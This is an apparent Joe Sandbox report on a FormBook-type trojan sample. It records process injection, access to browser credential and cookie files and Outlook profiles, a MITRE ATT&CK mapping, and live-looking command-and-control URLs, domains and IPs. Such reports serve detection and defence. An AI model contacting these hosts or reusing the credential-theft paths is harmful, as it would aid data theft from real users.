                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\rasdial.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_81
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_XP
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_XPe
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_VISTA
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_7
                Source: fFoOcuxK7M.exe | Binary or memory string: WIN_8
                Source: fFoOcuxK7M.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00136283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00136747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                MITRE ATT&CK Matrix (one line per tactic, listing the techniques shown in that column; the number in parentheses is the marker the report shows beside each matched technique):
                Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
                Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
                Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
                Execution: Native API (2), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
                Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Startup Items, Scheduled Task/Job, At
                Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (2), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
                Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
                Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
                Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
                Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
                Behavior Graph (rendered graph not recoverable; text summary): Behavior Graph ID: 1588135, Sample: fFoOcuxK7M.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100.
                Process chain: fFoOcuxK7M.exe (started) -> svchost.exe (started) -> TrOCMVbhcDRPP.exe (injected) -> rasdial.exe (started) -> TrOCMVbhcDRPP.exe (injected) and firefox.exe (started). Signatures attached to the nodes: Multi AV Scanner detection for submitted file; Yara detected FormBook; Binary is likely a compiled AutoIt script file; Performs DNS queries to domains with low reputation; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection).
                Network nodes: www.egldfi.xyz, www.lgdiamonds.info (130.185.109.77, ports 49996, 49997, 49998, XIRRADE, Germany), gtml.huksa.huhusddfnsuegcdn.com (23.167.152.41, port 49958 to 80, ESVC-ASNUS, Reserved), plus other IPs or domains.

                Antivirus detection (Source | Detection | Scanner | Label):
                fFoOcuxK7M.exe | 61% | Virustotal |
                fFoOcuxK7M.exe | 79% | ReversingLabs | Win32.Trojan.AutoitInject
                fFoOcuxK7M.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.lgdiamonds.info/cv1w/0%Avira URL Cloudsafe
                http://www.jalan2.online/lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.jalan2.online0%Avira URL Cloudsafe
                http://www.bcg.services/5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.bcg.services/5onp/0%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/0%Avira URL Cloudsafe
                http://www.75178.club/vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM=0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.jalan2.online/lvda/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.lgdiamonds.info
                130.185.109.77
                truefalse
                  high
                  43kdd.top
                  154.23.178.231
                  truefalse
                    unknown
                    jalan2.online
                    108.181.189.7
                    truefalse
                      high
                      gtml.huksa.huhusddfnsuegcdn.com
                      23.167.152.41
                      truefalse
                        high
                        www.bcg.services
                        13.248.169.48
                        truefalse
                          high
                          www.75178.club
                          unknown
                          unknownfalse
                            high
                            www.jalan2.online
                            unknown
                            unknownfalse
                              high
                              www.egldfi.xyz
                              unknown
                              unknowntrue
                                unknown
                                www.betmatchx.online
                                unknown
                                unknownfalse
                                  high
                                  www.43kdd.top
                                  unknown
                                  unknownfalse
                                    unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.jalan2.online/lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2 | false | Avira URL Cloud: safe | unknown
http://www.lgdiamonds.info/cv1w/ | false | Avira URL Cloud: safe | unknown
http://www.43kdd.top/bsyy/ | false | Avira URL Cloud: safe | unknown
http://www.jalan2.online/lvda/ | false | Avira URL Cloud: safe | unknown
http://www.43kdd.top/bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2 | false | Avira URL Cloud: safe | unknown
http://www.bcg.services/5onp/ | false | Avira URL Cloud: safe | unknown
http://www.bcg.services/5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2 | false | Avira URL Cloud: safe | unknown
http://www.75178.club/vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM= | false | Avira URL Cloud: safe | unknown
http://www.lgdiamonds.info/cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.jalan2.online | TrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
130.185.109.77 | www.lgdiamonds.info | Germany | 51191 | XIRRADE | false
13.248.169.48 | www.bcg.services | United States | 16509 | AMAZON-02US | false
23.167.152.41 | gtml.huksa.huhusddfnsuegcdn.com | Reserved | 395774 | ESVC-ASNUS | false
108.181.189.7 | jalan2.online | Canada | 852 | ASN852CA | false
154.23.178.231 | 43kdd.top | United States | 174 | COGENT-174US | false
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1588135
                                                      Start date and time:2025-01-10 21:45:04 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:fFoOcuxK7M.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@7/5
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 85%
                                                      • Number of executed functions: 50
                                                      • Number of non-executed functions: 278
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
15:47:04 | API Interceptor | 1944196x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
130.185.109.77 | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | www.lgdiamonds.info/cv1w/
130.185.109.77 | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | www.lgdiamonds.info/cv1w/
130.185.109.77 | New quotation request.exe | Get hash | malicious | FormBook | Browse | www.lgdiamonds.info/cv1w/
130.185.109.77 | New Order.exe | Get hash | malicious | FormBook | Browse | www.lgdiamonds.info/q2b2/
130.185.109.77 | need quotations.exe | Get hash | malicious | FormBook | Browse | www.lgdiamonds.info/cv1w/
130.185.109.77 | MaMsKRmgXZ.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
130.185.109.77 | Product24573.exe | Get hash | malicious | FormBook | Browse | www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
130.185.109.77 | Siirtokuitti_006703.exe | Get hash | malicious | FormBook, GuLoader | Browse | www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
130.185.109.77 | P5348574_74676.exe | Get hash | malicious | FormBook | Browse | www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
130.185.109.77 | 535276_86376.exe | Get hash | malicious | FormBook | Browse | www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
13.248.169.48 | aBEh0fsi2c.exe | Get hash | malicious | FormBook | Browse | www.fortevision.xyz/dash/
13.248.169.48 | EIvidclKOb.exe | Get hash | malicious | FormBook | Browse | www.sfantulandrei.info/wvsm/
13.248.169.48 | bkTW1FbgHN.exe | Get hash | malicious | FormBook | Browse | www.108.foundation/lnu5/
13.248.169.48 | OVZizpEU7Q.exe | Get hash | malicious | FormBook | Browse | www.tals.xyz/h8xm/
13.248.169.48 | QmBbqpEHu0.exe | Get hash | malicious | FormBook | Browse | www.hsa.world/09b7/
13.248.169.48 | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | www.bcg.services/5onp/
13.248.169.48 | 3HnH4uJtE7.exe | Get hash | malicious | FormBook | Browse | www.shipley.group/5g1j/
13.248.169.48 | KcSzB2IpP5.exe | Get hash | malicious | FormBook | Browse | www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
13.248.169.48 | TU0kiz3mxz.exe | Get hash | malicious | FormBook | Browse | www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
13.248.169.48 | QUOTATION#050125.exe | Get hash | malicious | FormBook | Browse | www.bonheur.tech/t3iv/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
gtml.huksa.huhusddfnsuegcdn.com | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | WDpjhC3jpq.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | KSts9xW7qy.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | 01152-11-12-24.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | DRAFT COPY BL, CI & PL.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | New quotation request.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | Invoice 10493.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
gtml.huksa.huhusddfnsuegcdn.com | HUEtVS3MQe.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
www.lgdiamonds.info | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
www.lgdiamonds.info | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
www.lgdiamonds.info | New quotation request.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
www.lgdiamonds.info | New Order.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
www.lgdiamonds.info | need quotations.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | NFhRxwbegd.exe | Get hash | malicious | FormBook | Browse | 18.139.62.226
AMAZON-02US | I3LPkQh2an.exe | Get hash | malicious | FormBook | Browse | 18.141.10.107
AMAZON-02US | statement.doc | Get hash | malicious | KnowBe4 | Browse | 52.217.123.201
AMAZON-02US | 9MZZG92yMO.exe | Get hash | malicious | FormBook | Browse | 76.223.67.189
AMAZON-02US | aBEh0fsi2c.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
AMAZON-02US | EIvidclKOb.exe | Get hash | malicious | FormBook | Browse | 13.228.81.39
AMAZON-02US | invoice_AG60538.pdf | Get hash | malicious | Unknown | Browse | 143.204.205.214
AMAZON-02US | bkTW1FbgHN.exe | Get hash | malicious | FormBook | Browse | 18.139.62.226
AMAZON-02US | OVZizpEU7Q.exe | Get hash | malicious | FormBook | Browse | 54.244.188.177
AMAZON-02US | QmBbqpEHu0.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
XIRRADE | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
XIRRADE | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
XIRRADE | New quotation request.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
XIRRADE | New Order.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
XIRRADE | need quotations.exe | Get hash | malicious | FormBook | Browse | 130.185.109.77
XIRRADE | file.exe | Get hash | malicious | SystemBC | Browse | 185.169.24.192
XIRRADE | Zam#U00f3wienie Z2300056_pdf .scr.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 185.169.24.118
XIRRADE | New order -24900242 OP_pdf .exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 185.169.24.118
XIRRADE | vAZYIEQMP8.elf | Get hash | malicious | Mirai, Moobot | Browse | 195.138.242.157
XIRRADE | MaMsKRmgXZ.exe | Get hash | malicious | FormBook, GuLoader | Browse | 130.185.109.77
ESVC-ASNUS | cNDddMAF5u.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | WDpjhC3jpq.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | KSts9xW7qy.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | 01152-11-12-24.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | DRAFT COPY BL, CI & PL.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | lgkWBwqY15.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | New quotation request.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | A2028041200SD.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
ESVC-ASNUS | Payment-251124.exe | Get hash | malicious | FormBook | Browse | 23.167.152.41
                                                      No context
                                                      No context
                                                      Process:C:\Windows\SysWOW64\rasdial.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                      Category:dropped
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1239949490932863
                                                      Encrypted:false
                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                      MD5:271D5F995996735B01672CF227C81C17
                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.995348669440679
                                                      Encrypted:true
                                                      SSDEEP:6144:GxAQPVybdVVpe5NXBGgKQM14kECFAqzfk0Qz9K8Xl:GfPVyJVVpqNXJIECJzfVQZ3l
                                                      MD5:2803879FEB74DA0BBFD90D1DCC071F28
                                                      SHA1:1AC3AB28F40FF152A011435EF7219201865CB5E1
                                                      SHA-256:ADC11FD3677971BD1E8A1C3FD99DA98596B3543C5D03B360133689A929759E8C
                                                      SHA-512:25192E7637AD404BD4B061646D23B120BE074D5D812E089E5CF898FBA485F2E52230968B22D3E25B14DE101D648B85757E8F0ACF264F94F2A4AFFB3719B416B1
                                                      Malicious:false
                                                      Reputation:low
